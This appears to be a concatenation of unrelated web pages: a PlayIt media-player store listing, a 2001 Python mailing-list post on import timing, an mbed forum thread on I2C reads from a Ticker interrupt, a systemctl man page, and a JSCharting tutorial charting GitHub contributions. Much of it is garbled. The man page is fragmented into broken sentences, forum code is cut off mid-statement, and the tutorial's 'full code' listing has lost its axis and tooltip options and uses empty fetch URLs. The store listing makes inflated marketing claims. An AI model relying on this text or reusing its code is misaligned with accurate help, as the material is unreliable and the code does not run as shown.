PlayIt - All-in-One Player

What is it about?

PlayIt is an all-in-one video player and music player.

App Store Description

PLAYit is ready to provide you a feast for eyes and ears! Instantly search all music and audio files, with support for all music & audio file formats and custom background skins. PLAYit is made to help millions of music lovers reach millions of high-quality videos. PlayIt Music Player is the best app to play online videos and share them as mp3. PlayIt Video Player is the best music player for iPhone. With all formats supported and a simple UI, PlayIt Music Player provides the best musical experience for you. Browse all songs on your iPhone device. You deserve to get this perfect offline music player for free now! The video to mp3 converter lets you convert any video to an mp3 file (not m4a), and this is the only app which can convert video to mp3. You can convert any video to mp3 using PlayIt.

Key features of PlayIt:
• All-in-one audio and video player
• Browse and play your music by Albums, Artists, Playlists, Genres, Folders, etc
• Combine Audio, Video, Online Music, Converted Mp3 and Imported video into a single Playlist
• Beautiful Lockscreen controls with full-screen album art support (enable/disable)
• Import Audio and video from other devices using the web share option
• Folder support - Play songs by folder
• Wearable support
• HD Video Player: Play It
• Floating video player
• Easy navigation & minimalistic design
• All video and audio formats supported
• HD video player for all formats: 4K videos, 1080p videos, MKV videos, FLV videos, 3GP videos, M4V videos, TS videos, MPG videos
• Playing queue with reorder - Easily add tracks & drag up/down to sort
• Powerful search - search quickly by songs, artist, album, etc
• Party Shuffle Music - shuffle all your tracks
• Genius Drag to Sort Playlist & Play Queue
• Headset/Bluetooth support
• Play now screen - Swipe to change songs
• Play songs in shuffle, repeat, loop & order
• The best free offline music app and media player

Import Videos and Audios: import all your favourite videos and audios from your PC or any other device to your phone with just one tap.

Nice and Simple User Interface: Enjoy your music with a stylish and simple user interface; Music Player is a perfect choice. The easiest player to play music with, without too many annoying features.

Playlist: Create any number of your own playlists. Playlists can combine online music and default music.

Default Music: Play your device music along with online music. Share your default music as an MP3 file with your friends and family.

Enjoy the PLAY.
https://appadvice.com/app/playit-all-in-one-player/1572047553
Hi, >>>>> "ej" == "eric" <ej at ee.duke.edu> writes: >> Currently, os.py in a package masks the real one from anywhere >> inside the package. This would extend that to anywhere inside >> any nested subpackage. Whether that's a "neat" or a "dirty" >> trick is pretty subjective. The wider the namespace you can >> trample on, the more it tends to be "dirty". ej> Yeah, I guess I come down on the "neat" side in this one. If ej> I have a module or package called 'common' at the top level of ej> a deep hierarchy, I'd like all sub-packages to inherit it. ej> That seems intuitive to me and inline with the concept of a ej> 'package'. Perhaps the hijacking of the Numeric example ej> strikes a nerve, but inheriting the 'common' module shouldn't ej> be so contentious. Also, if someone has the gall to hijack ej> os.py at the top of your package directory structure, it seems ej> very likely you want this new behavior everywhere within your ej> package. I agree on this. Also each package is kind of isolated. Any module like os.py inside a sub package won't affect _every_ other sub package and will only affect packages that are nested inside this particular package. So there is some kind of safety net and its not like sticking everything inside sys.path. :) Also, right now, what prevents someone from sticking an os.py somewhere in sys.path and completely ruining standard behaviour. So, its not asif this new approach to importing package makes things dirty, you can very well do 'bad' things right now. [snip] ej> As for overhead, I thought I'd get a couple more data points ej> from distutils and xml since they are standard packages. The ej> distutils import is pretty much a 0% hit. However, the xml ej> import is *much* slower -- a factor of 3.5. Thats a huge hit ej> and worth complaining about. I don't know if this can be ej> optimized or not. If not, it may be a show stopper, even if ej> the philosophical argument was uncontested. >>>> import my_import import time t1 = time.time();import >>>> xml.sax.saxutils; t2 = time.time();print t2-t1 1.35199999809 >>>> import time t1 = time.time();import xml.sax.saxutils; t2 = >>>> time.time();print t2-t1 0.381000041962 IMHO, this is an unfair/wrong comparison. (0) I suspect that you did not first clean things up by doing a plain import xml.sax.saxutils a few times and then start testing. (1) import itself is implemented in C. my_import is pretty much completely in Python. Here is a fairer comparison (done after a few imports). >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0434629917145 >>> import my_import >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0503059625626 Which is still not bad at all and nothing close to 350% slowdown. But to see if the presently measured slowdown is not the parent lookup we really need to compare things against the modified (to cache failures) knee.py: >>> import knee >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0477709770203 >>> import my_import >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0501489639282 Which is really not very bad since its just a 5% slowdown. 
Here are more tests for scipy: >>> import time >>> s = time.time (); import scipy; print time.time()-s 1.36110007763 >>> import knee, time >>> s = time.time (); import scipy; print time.time()-s 1.48176395893 >>> import my_import, time >>> s = time.time (); import scipy; print time.time()-s 1.5150359869 Which means that doing the parent lookup stuff in this case is really not so bad and the biggest slowdown is mostly thanks to knee being implemented in Python. And there is no question of a 350% slowdown!! :) prabhu
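For anyone reproducing these numbers, a small sketch of how to isolate just the import-machinery overhead (the loop count and helper below are my own choices, not something posted in the thread) is:

    import time
    import xml.sax.saxutils          # warm-up: make sure the module is already cached

    def time_import(n=1000):
        start = time.time()
        for _ in range(n):
            import xml.sax.saxutils  # only hits sys.modules (and any installed import hook)
        return (time.time() - start) / n

    print("plain import: %.6f s per import" % time_import())

    # import my_import              # install the custom importer, then measure again
    # print("with my_import: %.6f s per import" % time_import())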
https://mail.python.org/pipermail/python-list/2001-November/096264.html
3 days, 23 hours ago. I2C read from ticker Hi there, I have a problem. I want to read an I2C sensor periodically with a ticker, but it isn not working. I attached my logic analyser and the first write is working but as soon as the ticker is attached the SCL and SDA pins are just pulled down and there is no clock and nothing happens); my_ticker.attach(&read, 1); } EDIT: Here is the new code, which does not work either: #include "mbed.h" I2C i2c(I2C_SDA,I2C_SCL); DigitalOut pin(PA_5); Ticker my_ticker; // ticker for interrupt void readBNO() { pin = 1; char data[7]; data[0] = 0x10; i2c.write(0x70, data, 1, true); pin = 0; } int main() { my_ticker.attach(&readBNO, 1); while(true) { } } Here is a screenshot from logic of the output pins Thanks for helping Lorenz 2 Answers 3 days, 20 hours ago. I have a suspicion on what's going on but can you try this first and see if I2C works?); while(1){ wait(1);read(); } } Thanks for your answer but I know that the I2C works. I have a logic analyzer hooked up to SCL and SDA and I can see that the first command is working and that the data is correct. When the interrupt is called SCL and SDA both go from high to low, stay that way for 60ms and go up againposted by 15 Feb 2017 Ummm...I did not say I2C doesn't work... I said "see if it works"... I suspect that the timers used for ticker are pending any i2C service. My test would prove that.posted by 15 Feb 2017 3 days, 19 hours ago. Seems you try to read from a device at slaveaddress 0x50 after selecting a specific register (0x51) in the slave's internal registerspace. You skip the stop condition in the register selection phase and then want to use the ticker to repeatedly read from that same registeraddress. In that case the I2C operation in the the ticker interrupt should be a read instead of a write operation and it should use the same slaveaddress. You now have: .. i2c.write(0x70, data, 1, true); .. The incorrect slave address may confuse the slave and hang the I2C bus.. That should probably be .. i2c.read(0x50, data, 1, true); .. Note that this could still cause problems when the slave auto-increments the registeraddress, To make sure everything works as expected first try the complete read operation inside the Ticker. I2C i2c(I2C_SDA,I2C_SCL); Ticker my_ticker; // ticker for interrupt void read() { char data[7]; data[0] = 0x51; i2c.write(0x50, data, 1, true); // Set the registeraddress, repeated start i2c.read(0x50, data, 1); // Read from the register and issue stop condition } int main() { my_ticker.attach(&read, 1); while(1){ wait(1); } } No this is not the problem. There is no slave attached. The problem is that the I2C clock does not start to cycle between high and low, no matter what you try to write to it.posted by 15 Feb 2017 The I2C operations will terminate when there is no ack on the transmitted data. In case of an incorrect address or a slave that is not even attached you will not see any traffic after the address.posted by 16 Feb 2017 I know that. At the first write the address is written an then it terminates because there is no ack but in the ticker the address is not transmitted in the first place so there is nothing a slave could acknowledgeposted by 16 Feb 2017 The aborted write may not end with a stop since that was disabled. Could lead to problem with the I2C engine getting in an undefined state.posted by 16 Feb 2017 I just tested it and it is not the problem. 
you can see it on the screenshot I just added to the main post. posted by 17 Feb 2017 I did some testing on an F103 and the problem is related to the I2C read inside the Ticker. A call to read inside the main loop works as expected. The read inside the Ticker callback fails. Bill's assumption that something is wrong with the timers is very likely. It happened somewhere in mbed lib release 133. When you select revision 132 or below it still works as it should. There is a revision note for Rev 133 referring to "STM32 refactor lp_ticker", which could be a possible cause. This problem needs a bug report on GitHub. posted by 17 Feb 2017
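One common workaround, not settled on in the thread itself but worth sketching (the address and register value are taken from the question; everything else is a placeholder): keep the Ticker callback trivial and do the blocking I2C transfer from the main loop, since blocking bus access from interrupt context is fragile on mbed.

    #include "mbed.h"

    I2C i2c(I2C_SDA, I2C_SCL);
    Ticker my_ticker;
    volatile bool read_due = false;

    void on_tick() {
        read_due = true;                      // keep the ISR short: no I2C here
    }

    int main() {
        my_ticker.attach(&on_tick, 1.0f);     // fire once per second
        while (true) {
            if (read_due) {
                read_due = false;
                char data[1] = { 0x10 };
                i2c.write(0x70, data, 1, true);   // same transfer as in the question
                i2c.read(0x70, data, 1);          // finish with a stop condition
            }
            wait_ms(10);
        }
    }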
https://developer.mbed.org/questions/77029/I2C-read-from-ticker/
NAME systemctl - Control the systemd system and service manager SYNOPSIS DESCRIPTION systemctl may be used to introspect and control the state of the "systemd" system and service manager. Please refer to systemd(1) for an introduction into the basic concepts and functionality this tool manages. COMMANDS The following commands are understood: Unit Commands (Introspection and Modification) list-units [PATTERN...]. Note that this command does not show unit templates, but only instances of unit templates. Units templates that aren't instantiated are not runnable, and will thus never show up in the output of this command. Specifically this means that foo@.service will never be shown in this list — unless instantiated, e.g. as foo [AT] bar.service. Use list-unit-files (see below) for listing installed unit template files. [AT]-timers [PATTERN...] how long has passed since the timer last ran. UNIT shows the name of the timer ACTIVATES shows the name the service the timer activates when it runs. Also see --all and --state=.. Along with its color, its shape varies according to its state: "inactive" or "maintenance" is a white circle ("○"), "active" is a green dot ("●"), "deactivating" is a white dot, "failed" or "error" is a red cross ("×"), and "reloading" is a green clockwise circle arrow ("↻").. show [PATTERN...|JOB...] internally by the system and service manager. For details about many of these properties, see the documentation of the D-Bus interface backing these properties, see org.freedesktop.systemd1(5). cat PATTERN.... help PATTERN...|PID... Show manual pages for one or more units, if available. If a PID is given, the manual pages for the unit the process belongs to are shown. list-dependencies [UNIT...] Shows units required and wanted by the specified units. This recursively lists units following the Requires=, Requisite=, ConsistsOf=, Wants=, BindsTo= dependencies. If no units are specified, default.target is implied.... Start (activate) one or more units specified on the command line. Note that unit glob patterns expand to.... Stop (deactivate) one or more units specified on the command line.. in the web server, not the apache.service systemd unit file. This command should not be confused with the daemon-reload command. restart PATTERN....)). If a unit name with no extension is given, an extension of ".target" will be assumed. This command is dangerous, since it will immediately stop processes that are not enabled in the new target,. clean PATTERN... Remove the configuration, state, cache, logs or runtime data of the specified units. Use --what= to select which kind of resource to remove. For service units this may be used to remove the directories configured with ConfigurationDirectory=, StateDirectory=, CacheDirectory=, LogsDirectory= and RuntimeDirectory=, see systemd.exec(5) for details. For timer units this may be used to clear out the persistent timestamp data if Persistent= is used and --what=state is selected, see systemd.timer(5). This command only applies to units that use either of these settings. If --what= is not specified, both the cache and runtime data are removed (as these two types of data are generally redundant and reproducible on the next invocation of the unit). freeze PATTERN... Freeze one or more units specified on the command line using cgroup freezer... Thaw (unfreeze) one or more units specified on the command line. 
This is the inverse operation to the freeze command and resumes the execution of processes in the unit's cgroup., and stored on disk for future boots, unless --runtime is passed, in which case the settings only apply until the next reboot. The syntax of the property assignment follows closely the syntax of assignments in unit files.= bind UNIT PATH [PATH] Bind-mounts a file or directory from the host into the specified unit's mount namespace. The first path argument is the source file or directory on the host, the second path argument is the destination file or directory in the unit's mount namespace. When the latter is omitted, the destination path in the unit's mount namespace units that run within a mount namespace (e.g.: with RootImage=, PrivateMounts=, etc.). This command supports bind-mounting directories, regular files, device nodes, AF_UNIX socket nodes, as well as FIFOs. The bind mount is ephemeral, and it is undone as soon as the current unit process exists. Note that the namespace mentioned here, where the bind mount will be added to, is the one where the main service process runs. Other processes (those exececuted by ExecReload=, ExecStartPre=, etc.) run in distinct namespaces. mount-image UNIT IMAGE [PATH [PARTITION_NAME:MOUNT_OPTIONS]] Mounts an image from the host into the specified unit's mount namespace. The first path argument is the source image on the host, the second path argument is the destination directory in the unit's mount namespace (i.e. inside RootImage=/RootDirectory=). The following argument, if any, is interpreted as a colon-separated tuple of partition name and comma-separated list of mount options for that partition. The format is the same as the service MountImages= setting. When combined with the --read-only switch, a ready-only mount is created. When combined with the --mkdir switch, the destination path is first created before the mount is applied. Note that this option is currently only supported for units that run within a mount namespace (i.e. with RootImage=, PrivateMounts=, etc.). Note that the namespace mentioned here where the image mount will be added to, is the one where the main service process runs. Note that the namespace mentioned here, where the bind mount will be added to, is the one where the main service process runs. Other processes (those exececuted by ExecReload=, ExecStartPre=, etc.) run in distinct namespaces. Example: systemctl mount-image foo.service /tmp/img.raw /var/lib/image root:ro,nosuid systemctl mount-image --mkdir bar.service /tmp/img.raw /var/lib/baz/img service-log-level SERVICE [LEVEL] If the LEVEL argument is not given, print the current log level as reported by service SERVICE. TARGET argument is not given, print the current log target as reported by service SERVICE..). Unlike list-units this command will list template units in addition to explicitly instantiated units. enable UNIT..., [AT]. The file system where the linked unit files are located must be accessible when systemd is started (e.g. anything underneath /home/ or /var/ is not allowed, unless those directories are located on the root file system).. disable UNIT... UNIT.... preset UNIT.... UNIT must be the real unit name, any alias names are ignored silently. For more information on the preset policy format, see systemd.preset(5). preset-all Resets all installed unit files to the defaults configured in the preset policy file (see above). Use --preset-mode= to control whether units shall be enabled and disabled, or only enabled, or only disabled. 
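For illustration (these invocations are not part of the original page text; foo.service is a placeholder), a typical enable-and-inspect round trip looks like:

    # systemctl enable --now foo.service
    # systemctl is-enabled foo.service
    enabled
    # systemctl disable foo.service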
is-enabled... UNIT.... The file system where the linked unit files are located must be accessible when systemd is started (e.g. anything underneath /home/ or /var/ is not allowed, unless those directories are located on the root file system). revert UNIT... UNIT..., add-requires TARGET UNIT... Adds "Wants=" or "Requires=" dependencies, respectively, to the specified TARGET for one or more units. This command honors --system, --user, --runtime and --global in a way similar to enable. edit UNIT... TARGET. cancel JOB... Cancel one or more jobs specified on the command line by their numeric job IDs. If no job ID is specified, cancel all pending jobs. Environment Commands systemd... Set one or more systemd manager environment variables, as specified on the command line. This command will fail if variable names and values do not conform to the rules listed above. a list of environment variable names is passed, client-side values are then imported into the manager's environment block. If any names are not valid environment variable names or have invalid values according to the rules described above, an error is raised. If no arguments are passed, the entire environment block inherited by the systemctl process is imported. In this mode, any inherited invalid environment variables are quietly ignored. Importing of the full inherited environment block (calling this command without any arguments) is deprecated. A shell will set dozens of variables which only make sense locally and are only meant for processes which are descendants of the shell. Such variables in the global environment block are confusing to other processes. Manager State. log-level [LEVEL] If no argument is given, print the current log level of the manager. If an optional argument LEVEL is provided, then the command changes the current log level of the manager to LEVEL (accepts the same values as --log-level= described in systemd(1)). log-target [TARGET] If no argument is given, print the current log target of the manager. If an optional argument TARGET is provided, then the command changes the current log target of the manager to TARGET (accepts the same values as --log-target=, described in systemd(1)). service-watchdogs [yes|no] If no argument is given, print the current state of service runtime watchdogs of the manager. If an optional boolean argument is provided, then globally enables or disables the service runtime watchdogs (WatchdogSec=) and emergency actions (e.g. OnFailure= or StartLimitAction=); see systemd.service(5). The hardware watchdog is not affected by this setting... poweroff. reboot switch --reboot-argument= is given, it will be passed as the optional argument to the reboot(2) system call. kexec ), UNIT should be the name of the unit file (possibly abbreviated, see above), or the absolute path to the unit file: # systemctl enable foo.service or # systemctl link /path/to/foo.service, most of which are derived or closely match the options described. -P Equivalent to --value --property=, i.e. shows the value of the property without the property name or "=". Note that using -P once will also affect all properties listed with -p/--property=. ). When used with status, show journal messages in full, even if they include unprintable characters or are very long. By default, fields with unprintable characters are abbreviated as "blob data". (Note that the pager may escape unprintable characters again.) . 
--with-dependencies When used with status, cat, list-units, and list-unit-files, those commands print all specified units and the dependencies of those units. Options --reverse, --after, --before may be used to change what types of dependencies are shown. "=". Also see option -P above. --show-types When showing sockets, show the type of the socket. --job-mode= When queuing a new job, this option controls how to deal with already queued jobs. It takes one of "fail", "replace", "replace-irreversibly", "isolate", "ignore-dependencies", "ignore-requirements", "flush", or "triggering".. "triggering" may only be used with systemctl stop. In this mode, the specified unit and any active units that trigger it are stopped. See the discussion of Triggers= in systemd.unit(5) for more information about triggering units. -T, --show-transaction When enqueuing a unit job (for example as effect of a systemctl start invocation or similar), show brief information about all jobs enqueued, covering both the requested job and any added because of unit dependencies. Note that the output will only include jobs immediately part of the transaction requested. It is possible that service start-up program code run as effect of the enqueued jobs might request further jobs to be pulled in. This means that completion of the listed jobs might ultimately entail more jobs than the listed ones. --fail Shorthand for --job-mode=fail. When used with the kill command, if no units were killed, the operation results in an error. --check-inhibitors= When system shutdown or sleep state is request, this option controls how to deal with inhibitor locks. It takes one of "auto", "yes" or "no". Defaults to "auto", which will behave like "yes" for interactive invocations (i.e. from a TTY) and "no" for non-interactive invocations. "yes" will let the request respect inhibitor locks. "no" will let the request (unless privileged) and a list of active locks is printed. However, if "no" is specified or "auto" is specified on a non-interactive requests, the established locks are ignored and not shown, and the operation attempted anyway, possibly requiring additional privileges. May be overridden by --force. -i Shortcut for --check-inhibitors=no. --dry-run Just print what would be done. Currently supported by verbs halt, poweroff, reboot, kexec, suspend, hibernate, hybrid-sleep, suspend-then-hibernate, default, rescue, emergency, and exit. . The special value "help" will list the known values and the program will exit immediately, and the special value "list" will list known values along with the numerical signal numbers and the program will exit immediately. --what= Select what type of per-unit resources to remove when the clean command is invoked, see below. Takes one of configuration, state, cache, logs, runtime to select the type of resource. This option may be specified more than once, in which case all specified resource types are removed. Also accepts the special value all as a shortcut for specifying all five resource types. If this option is not specified defaults to the combination of cache and runtime, i.e. the two kinds of resources that are generally considered to be redundant and can be reconstructed on next invocation. the specified root path when looking for unit files. If this option is present, systemctl will operate on the file system directly, instead of communicating with the systemd daemon to carry out changes. -, or 0 to disable journal output. Defaults to 10. 
-o, --output= When used with status, controls the formatting of the journal entries that are shown. For the available choices, see journalctl(1). Defaults to "short". --firmware-setup When used with the reboot command, indicate to the system's firmware to reboot into the firmware setup interface. Note that this functionality is not available on all systems. --boot-loader-menu= When used with the reboot command, indicate to the system's boot loader to show the boot loader menu on the following boot. Takes a time value as parameter — indicating the menu timeout. Pass zero in order to disable the menu timeout. Note that not all boot loaders support this functionality. --boot-loader-entry= When used with the reboot command, indicate to the system's boot loader to boot into a specific boot loader entry on the following boot. Takes a boot loader entry identifier as argument, or "help" in order to list available entries. Note that not all boot loaders support this functionality. --reboot-argument= This switch is used with reboot. The value is architecture and firmware specific. As an example, "recovery" might be used to trigger system recovery, and "fota" might be used to trigger a “firmware over the air” update. --plain When used with list-dependencies, list-units or list-machines, the output is printed as a list instead of a tree, and the bullet circles are omitted. --timestamp= Change the format of printed timestamps. The following values may be used: pretty (this is the default) "Day YYYY-MM-DD HH:MM:SS TZ" us, µs "Day YYYY-MM-DD HH:MM:SS.UUUUUU TZ" utc "Day YYYY-MM-DD HH:MM:SS UTC" us+utc, µs+utc "Day YYYY-MM-DD HH:MM:SS.UUUUUU UTC" --mkdir. --marked Only allowed with reload-or-restart. Enqueues restart jobs for all units that have the "needs-restart" mark, and reload jobs for units that have the "needs-reload" mark. When a unit marked for reload does not support reload, restart will be queued. Those properties can be set using set-property Marks. Unless --no-block is used, systemctl will wait for the queued jobs to finish. --read-only When used with bind, creates a read-only bind mount. . --no-pager Do not pipe output into a pager. --legend=BOOL Enable or disable printing of the legend, i.e. column headers and the footer with hints. The legend is printed by default, unless disabled with --quiet or similar. -h, --help Print a short help text and exit. --version Print a short version string and exit. EXIT STATUS On success, 0 is returned, a non-zero failure code otherwise. systemctl uses the return codes defined by LSB, as defined in LSB 3.0.0 [1] . Table 3. LSB return codes The mapping of LSB service states to systemd unit states is imperfect, so it is better to not rely on those return values but to look for specific unit states and substates instead.. SEE ALSO systemd(1), journalctl(1), loginctl(1), machinectl(1), systemd.unit(5), systemd.resource-control(5), systemd.special(7), wall(1), systemd.preset(5), systemd.generator(7), glob(7) NOTES
https://man.cx/systemctl(1)
CC-MAIN-2022-21
refinedweb
2,759
57.37
I’ve been asked to review the JSCharting enterprise charting library, and given that I’ve recently dabbled in visualizations I felt like this was a great opportunity to further explore them in JavaScript. JSCharting enables you to make visualizations in JavaScript using a declarative interface that renders SVG graphics. JSCharting specializes in rendering all kinds of charts – including geographic representations of data like a “sales by state” chart. Another cool example is this visualization of the average temperature in Chicago plotted over time. For a full list of chart types and examples, you should visit their website – it has a comprehensive selection of charts demonstrating the different features in JSCharting. You might want to check out their release history visualization for a better understanding of the kinds of features they have. In this article we’ll explore the kinds of visualizations that you can perform using JSCharting. Let’s start by installing the library. Getting Started To install JSCharting you’ll need to register for a free trial and then download the development bundle .zip. After extracting it into a bundle directory, you’ll have everything you need to start using the library. As a first example, you could create an HTML page like the one below. Note that the library depends on jQuery. We’ll also add a <div> where we’ll be rendering our first chart, and a <script src='example.js'> tag where we’ll add our charting code. <div id='chart'></div> <script src='bundle/jsc/jquery-latest.min.js'></script> <script src='bundle/jsc/jscharting.js'></script> <script src='example.js'></script> As for our first steps into the charting world, below you’ll find the code necessary to render our first chart. The targetElement option specifies the HTML id attribute for our container – where JSCharting will append an <svg> element. The series option can be used to indicate point series we want to render. We gave the series a name, and it also takes a collection of points. In this case we have a single point consisting of a date for the horizontal x axis and a floating point number for the y axis. You can specify as many points as your point series needs. Once the options have been configured, you can create the chart by calling new JSC.Chart(options), as seen below. var options = { targetElement: 'chart', series: [{ name: 'Purchases', points: [ [new Date(2010, 0, 1), 29.9] ] }] }; var chart = new JSC.Chart(options); Of course, doing that would just render a chart with a single point on it – not that exciting. Let’s add a few more points, and let’s pull those points from my GitHub account’s public contribution activity. Charting GitHub Commit Activity We’ll be using the brand new fetch API for this one as well. The following piece of code pulls down public events broadcasted by my GitHub account, filters out all non-push events (such as commenting or other interactions with the GitHub UI), reduces those events into contribution counts by date, and finally prints them to the console. fetch('https://api.github.com/users/bevacqua/events/public') .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(data => console.log(data)) // { 2015-09-21: 7, 2015-09-19: 1, 2015-09-18: 3 } function merge (counts, push) { var date = push.created_at.slice(0, 10) if (date in counts) { counts[date]++ } else { counts[date] = 1 } return counts } Check out the promisees visualization of that code.
If you’re confused about the => notation in the code below, refer to my arrow functions in ES6 article. Now that we have the counts for each date, we should map them into something JSCharting understands – a bi-dimensional [[date, count]] array. We can use Object.keys and .map for that one. fetch('https://api.github.com/users/bevacqua/events/public') .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(counts => Object .keys(counts) .map(date => [new Date(date), counts[date]]) ) .then(data => console.log(data)) // [[Date(2015-09-21), 7], [Date(2015-09-19), 1], [Date(2015-09-18), 3]] function merge (counts, push) { var date = push.created_at.slice(0, 10) if (date in counts) { counts[date]++ } else { counts[date] = 1 } return counts } Lastly, we actually render the chart. In the code below we’ve barely changed the chart-rendering code we had earlier: instead of displaying a single hard-coded point, we’re now using each data point pulled from GitHub’s API. fetch('https://api.github.com/users/bevacqua/events/public') .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(counts => Object .keys(counts) .map(date => [new Date(date), counts[date]]) ) .then(points => { var options = { targetElement: 'chart', series: [{ name: 'GitHub Activity', points: points }] } var chart = new JSC.Chart(options) }) function merge (counts, push) { var date = push.created_at.slice(0, 10) if (date in counts) { counts[date]++ } else { counts[date] = 1 } return counts } Here’s how our chart looks so far. It represents all three dates with contributions and the contribution count for each. It’s nice that we didn’t have to do anything in terms of defining domains for our axes, choosing a color for the plotted line, or anything much other than providing the data points. At this point I feel very lonely in the GitHub contribution planet, though. Adding Contributors to the Chart Let’s add a few more contributors to the graph. In order to do that we have to move our fetch call into a method where we pass in a username and get back a Promise, as seen in the snippet below. I’ve also added one more call to .then where I return the data points along with the user name (this replaces our old 'GitHub Activity' string). Curious about the backticks? Those are ES6 template literals. function pull (username) { var base = 'https://api.github.com' return fetch(`${base}/users/${username}/events/public`) .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(counts => Object .keys(counts) .map(date => [new Date(date), counts[date]]) ) .then(points => ({ name: '@' + username, points })) } We can now leverage Promise.all to render a few different open-source contributors onto a chart. Promise.all awaits an entire collection of promises and then returns all of their results in an Array object. Promise .all([ pull('bevacqua'), pull('substack'), pull('addyosmani'), pull('sindresorhus') ]) .then(lines => { var options = { targetElement: 'chart', series: lines } var chart = new JSC.Chart(options) }) Surely, we could also use an array of names and map them into promises with pull, for brevity.
Promise .all(['bevacqua', 'substack', 'addyosmani', 'sindresorhus'].map(pull)) .then(lines => { var options = { targetElement: 'chart', series: lines } var chart = new JSC.Chart(options) }) That looks a bit better now, we were able to render a bunch of different contributors onto the same chart and we can now quickly compare their output in terms of public GitHub contributions. You have to keep in mind that these charts are based on the commits found in the last thirty public events published on each of these members accounts, and not necessarily all of their recent activity. Let’s go back to the chart found at the beginning. Week Over Week Contribution Area Range Going back to that first area chart I’ve shown, it definitely looks cool, so let’s try and come up with an example that’s similar to that chart. I think a cool visualization might be to plot the contributions on a single repository over time. We’ll be plotting ranges comprised of the days with the least and the most contributions in each given week. In order to do that, we first need to come up with the ranges for each week. GitHub happens to have an API endpoint that gives us exactly what we need, the commit_activity endpoint. It returns the last year of commit activity on any given public repository. You get back commit counts by day, as shown below. [ { "days": [ 0, 3, 26, 20, 39, 1, 0 ], "total": 89, "week": 1336280400 }, ... ] For this one I wanted to plot out the weekly highs and lows in the nodejs/node repository in terms of contributions. First off we’ll be pulling the data from GitHub’s API, using fetch once again. fetch('') .then(response => response.json()) Just like the last time around, a little data massaging is in order. After pulling the weeks from the JSON response, we’ll need to map them into a list of points containing a date on the x axis and then the highest and lowest days on the y axis. Below I’ve used moment to figure out the week from the position of each data point in the response. There’s also the ... spread operator being used for brevity – it’s as if I were doing Math.min.apply(null, week.days). It spreads the values in an array over the parameter list of the method call. fetch('') .then(response => response.json()) .then(weeks => weeks .map((week, i) => ({ x: moment().subtract(52 - i, 'weeks').toDate(), y: [ Math.min(...week.days), Math.max(...week.days) ] })) ) .catch(error => []) .then(points => { // render chart here }) You can install moment via Bower – that’s what I did in my example code – available on GitHub. At this point we have the points needed to render the area chart, and they’re properly formatted into something JSCharting understands: x/ y coordinates. This chart took many more configuration options to get right, so we’ll go over each of them before looking at the full picture. First off, there’s the chart type. There’s an immense number of JSCharting chart types so we can’t possibly cover all of them here, but we’ll try to cover a few. The areaSpline chart type produces charts like the one we saw in the first screenshot at the top of the article. type: 'areaSpline' Remember the legends with the GitHub usernames in the last example? It was kind of awkward that they were completely outside the chart. The following setting moves the legend inside the chart with a padding of 4px. legendPosition: 'CA:4,4' I thought it’d be nice to give the chart a title using the JSCharting API itself, so I did that with the next couple of options. 
Note how JSCharting provides us with variables such as %min, %max, and %average so that we can print data-based information right on the chart’s title – try this link for a full list of these variables. titlePosition: 'full', titleLabelText: ` Weekly GitHub Contribution Activity on nodejs/node repo. Range: %min to %max commits, Average: %average commits` The x axis needs to be scaled into weeks, as we have a data point for each week, and we could also format the label into something that’s readable but not very verbose – for example, something like Jan 23. xAxis: { formatString: 'MMM dd', scaleIntervalUnit: 'week' } The y axis represents commits. So we label it as such. I’ve also set a lower bound of 0 as negative amounts of commits don’t make sense with our data. yAxis: { labelText: 'Commits', scaleRangeMin: 0 } I also wanted to display a threshold – just like in the screenshot we saw earlier – a subtle area in the chart that indicated periods where commit frequency dwindled into near inactivity. Of course, this just means “at least one day in the week commit frequency was low”, so take that data with a grain of salt. The value option specifies the range where I want to add this “danger zone” area, and I’ve also added a label describing the area and gave it a somewhat transparent yellowish color. yAxis: { markers: [{ value: [0, 5], labelText: 'Infrequent Commits', labelAlign: 'center', color: ['#fcc348', 0.6] }] } Then there’s the tooltips. Tooltips are very important because they give you a ton of context into what the datapoint actually means. Here I went descriptive and explained that for a given week there was a high of y1 commits and a low of y2 commits. You can see how we have access to JSCharting variables here as well. defaultPointTooltip: ` <b>Week of %xValue</b> <br/>High: <b>%yValue Commits</b> <br/>Low: <b>%yStart Commits</b>` Lastly, there’s the series. We’re already familiar with this, so you just need to know I gave it a name and passed in the points we got back from the GitHub API after massaging their data. series: [{ name: 'Daily Contributions', points: points }] The full code for our area range chart ends up looking as shown below. fetch('') .then(response => response.json()) .then(weeks => weeks .map((week, i) => ({ x: moment().subtract(52 - i, 'weeks').toDate(), y: [ Math.min(...week.days), Math.max(...week.days) ] })) ) .catch(error => []) .then(points => { var options = { targetElement: 'chart', type: 'areaSpline', legendPosition: 'CA:4,4', titleLabelText: ` Weekly GitHub Contribution Activity on ${repo} repo. Range: %min to %max commits, Average: %average commits`,: [{ name: 'Daily Contributions', points: points }] } var chart = new JSC.Chart(options) }) And here’s how it’s rendered in the browser. Let’s repeat our brief exercise from earlier and add more area ranges to the chart, so that we can compare contributions made to different repositories and not just nodejs/node. Adding Repositories to the Area Chart Unsurprisingly we’ve already done the bulk of the load. We could start by moving the data-fetching Promise into a pull method. That method will be able to pull any data points we need for any repositories we want. It returns a promise that resolves to the repository name and its data points. 
